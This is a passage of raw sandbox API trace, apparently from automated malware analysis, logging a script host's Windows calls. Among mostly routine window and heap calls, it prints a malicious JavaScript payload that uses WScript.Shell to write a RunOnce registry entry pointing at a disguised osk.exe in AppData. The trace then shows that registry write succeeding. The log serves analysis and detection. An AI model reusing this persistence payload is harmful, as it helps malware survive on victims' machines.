uFlags=0x37) returned 1 [0076.639] NtdllDefWindowProc_W () returned 0x0 [0076.639] NtdllDefWindowProc_W () returned 0x0 [0076.640] NtdllDefWindowProc_W () returned 0x0 [0076.640] GlobalAddAtomW (lpString=0x0) returned 0x0 [0076.640] SetPropW (hWnd=0x6011a, lpString=0x0, hData=0x6011a) returned 0 [0076.640] ShowWindow (hWnd=0x3027a, nCmdShow=0) returned 0 [0076.640] UpdateWindow (hWnd=0x3027a) returned 1 [0076.640] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0076.640] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0076.640] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0076.640] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0076.640] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0076.640] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0076.641] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0076.641] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0076.641] GetCurrentThreadId () returned 0x544 [0076.641] GetCurrentThreadId () returned 0x544 [0076.641] GetCurrentThreadId () returned 0x544 [0077.054] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33efd0 | out: lpPoint=0x33efd0) returned 1 [0077.054] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0077.054] GetCurrentThreadId () returned 0x544 [0077.055] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0077.055] GetCurrentThreadId () returned 0x544 [0077.055] GetFocus () returned 0x302a0 [0077.055] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x50) returned 0x7a3338 [0077.055] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0077.055] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f000 | out: lpPoint=0x33f000) returned 1 [0077.055] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0077.055] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0077.056] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33efe8 | out: lpPoint=0x33efe8) returned 1 [0077.056] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0077.056] GetCurrentThreadId () returned 0x544 [0077.056] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0077.056] GetCurrentThreadId () returned 0x544 [0077.056] IsWinEventHookInstalled (event=0x8005) returned 0 [0077.056] StrCmpICW (pszStr1="about:blank", pszStr2="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned -9 [0077.056] StrCmpICW (pszStr1="about:blank", pszStr2="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned -9 [0077.056] GetCurrentThreadId () returned 0x544 [0077.056] GetCurrentThreadId () returned 0x544 [0077.056] GetCurrentThreadId () returned 0x544 [0077.056] GetCurrentThreadId () returned 0x544 [0077.057] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f528 | out: lpPoint=0x33f528) returned 1 [0077.057] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0077.057] GetCurrentThreadId () returned 0x544 [0077.057] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0077.057] GetCurrentThreadId () returned 0x544 [0077.057] GetCurrentThreadId () returned 0x544 [0077.057] GetFocus () returned 0x302a0 [0077.057] GetCurrentThreadId () returned 0x544 [0077.057] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f4e8 | out: lpPoint=0x33f4e8) returned 1 [0077.057] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0077.058] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0077.058] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f4c8 | out: lpPoint=0x33f4c8) returned 1 [0077.058] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0077.058] GetCurrentThreadId () returned 0x544 [0077.058] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0077.058] GetCurrentThreadId () returned 0x544 [0077.058] IsWinEventHookInstalled (event=0x8005) returned 0 [0077.058] GetCurrentThreadId () returned 0x544 [0077.058] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.058] NtdllDefWindowProc_W () returned 0x1 [0077.061] NtdllDefWindowProc_W () returned 0x0 [0077.061] NtdllDefWindowProc_W () returned 0x0 [0077.061] NtdllDefWindowProc_W () returned 0x0 [0077.061] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0077.061] GetParent (hWnd=0x302a0) returned 0x3027a [0077.061] GetParent (hWnd=0x3027a) returned 0x6011a [0077.061] GetParent (hWnd=0x6011a) returned 0x0 [0077.061] PostMessageW (hWnd=0x302a0, Msg=0x491, wParam=0x0, lParam=0x0) returned 1 [0077.062] GetMessageTime () returned 124769 [0077.062] GetMessagePos () returned 0x35603df [0077.062] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f280 | out: lpPoint=0x33f280) returned 1 [0077.062] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f280 | out: lpPoint=0x33f280) returned 1 [0077.062] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0077.062] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a9378 [0077.063] GetCurrentThreadId () returned 0x544 [0077.063] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0077.063] GetCurrentThreadId () returned 0x544 [0077.063] GetCurrentThreadId () returned 0x544 [0077.063] PostMessageW (hWnd=0x20280, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0077.063] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a9378 | out: hHeap=0x760000) returned 1 [0077.063] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x8, wParam=0x0, lParam=0x0, plResult=0x33f4bc | out: plResult=0x33f4bc) returned 0x1 [0077.063] NtdllDefWindowProc_W () returned 0x0 [0077.063] GetCurrentThreadId () returned 0x544 [0077.063] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0077.064] GetMessageTime () returned 124769 [0077.064] GetMessagePos () returned 0x35603df [0077.064] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x33f0cc | out: plResult=0x33f0cc) returned 0x0 [0077.064] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0077.064] GetMessageTime () returned 124769 [0077.064] GetMessagePos () returned 0x35603df [0077.064] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xf8) returned 0x7cb770 [0077.065] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x33eafc | out: plResult=0x33eafc) returned 0x0 [0077.065] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7cb770 | out: hHeap=0x760000) returned 1 [0077.065] GetCurrentThreadId () returned 0x544 [0077.065] GetCurrentThreadId () returned 0x544 [0077.065] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.065] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.065] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0077.065] GetAncestor (hwnd=0x302a0, gaFlags=0x2) returned 0x3027a [0077.065] IsIconic (hWnd=0x3027a) returned 0 [0077.065] GetCurrentThreadId () returned 0x544 [0077.065] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.065] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.065] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.065] GetFocus () returned 0x0 [0077.065] EnumChildWindows (hWndParent=0x302a0, lpEnumFunc=0x74e10a73, lParam=0x33f4ec) returned 0 [0077.065] GetCurrentThreadId () returned 0x544 [0077.066] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f4e8 | out: lpPoint=0x33f4e8) returned 1 [0077.066] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0077.066] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0077.066] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f4c8 | out: lpPoint=0x33f4c8) returned 1 [0077.066] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0077.066] GetCurrentThreadId () returned 0x544 [0077.066] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0077.067] GetCurrentThreadId () returned 0x544 [0077.067] IsWinEventHookInstalled (event=0x8005) returned 0 [0077.067] GetCurrentThreadId () returned 0x544 [0077.067] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.067] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.067] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.067] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0077.067] KillTimer (hWnd=0x302a0, uIDEvent=0x1000) returned 1 [0077.067] GetCurrentThreadId () returned 0x544 [0077.067] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.067] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.067] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.067] KillTimer (hWnd=0x20280, uIDEvent=0x2000) returned 1 [0077.067] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.067] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.068] IUnknown:Release (This=0x787518) returned 0x1 [0077.068] GetCurrentThreadId () returned 0x544 [0077.068] GetCurrentThreadId () returned 0x544 [0077.068] GetCurrentThreadId () returned 0x544 [0077.071] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0077.071] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0077.071] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0077.071] IsCharSpaceW (wch=0x69) returned 0 [0077.071] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0077.071] IsCharSpaceW (wch=0x69) returned 0 [0077.072] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.072] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.072] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.072] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.072] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.072] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.072] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.072] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.072] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.073] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1 [0077.073] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.073] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2 [0077.073] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.265] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1 [0077.265] LoadRegTypeLib (in: rguid=0x74a014bc*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x33ef94*=0x0 | out: pptlib=0x33ef94*=0x7cb878) returned 0x0 [0077.268] ITypeLib:GetTypeInfoOfGuid (in: This=0x7cb878, GUID=0x74a014cc, ppTInfo=0x33ef78 | out: ppTInfo=0x33ef78*=0x7a9714) returned 0x0 [0077.268] ITypeInfo:GetRefTypeOfImplType (in: This=0x7a9714, index=0xffffffff, pRefType=0x33ef6c | out: pRefType=0x33ef6c*=0xfffffffe) returned 0x0 [0077.268] ITypeInfo:GetRefTypeInfo (in: This=0x7a9714, hreftype=0xfffffffe, ppTInfo=0x74a1501c | out: ppTInfo=0x74a1501c*=0x7a9740) returned 0x0 [0077.268] IUnknown:Release (This=0x7a9714) returned 0x1 [0077.268] IUnknown:Release (This=0x7cb878) returned 0x1 [0077.268] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.268] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.268] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.268] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.268] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.268] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.269] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.269] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.269] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.269] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.270] RegCloseKey (hKey=0x280) returned 0x0 [0077.270] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.270] GetCurrentThreadId () returned 0x544 [0077.270] GetCurrentThreadId () returned 0x544 [0077.270] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.270] GetCurrentThreadId () returned 0x544 [0077.270] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x7c64a0 [0077.271] SetTimer (hWnd=0x20280, nIDEvent=0x2001, uElapse=0xa, lpTimerFunc=0x0) returned 0x2001 [0077.277] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.277] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.277] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.277] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0077.277] SetTimer (hWnd=0x302a0, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0077.277] GetCurrentThreadId () returned 0x544 [0077.277] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.288] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.288] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.288] KillTimer (hWnd=0x20280, uIDEvent=0x2001) returned 1 [0077.288] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.288] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.288] IUnknown:Release (This=0x787518) returned 0x1 [0077.289] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.289] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.289] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.289] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.289] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.289] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.289] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.289] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.289] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.289] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2 [0077.289] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.290] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3 [0077.290] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, 